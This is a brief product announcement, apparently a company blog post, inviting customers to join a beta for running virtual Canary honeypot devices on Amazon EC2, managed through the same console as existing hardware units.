Since almost day one, customers have been asking for virtual Canaries.  We generally prefer doing one thing really well over doing multiple things "kinda ok", so we held off virtualising Canary for a long time. This changes now.

With Canary software now on version 2.0 and running happily across thousands of birds, a crack at virtual Canaries make sense. Over the past couple of months we’ve been working to get Canaries virtualised, with a specific focus initially, on Amazon’s EC2.

We're inviting customers to participate in a beta for running Canaries in Amazon’s EC2. The benefits are what you’d expect: no hardware, no waiting for shipments and rapid deployments. You can plaster your EC2 environment with Canaries, trivially.

The beta won't affect your current licensing, and you’re free to deploy as many Cloud Canaries as you like during the beta period. They use the same console as your other birds, and integrate seamlessly.

Mail cloudcanarybeta@canary.tools if you’d like to participate and we'll make it happen.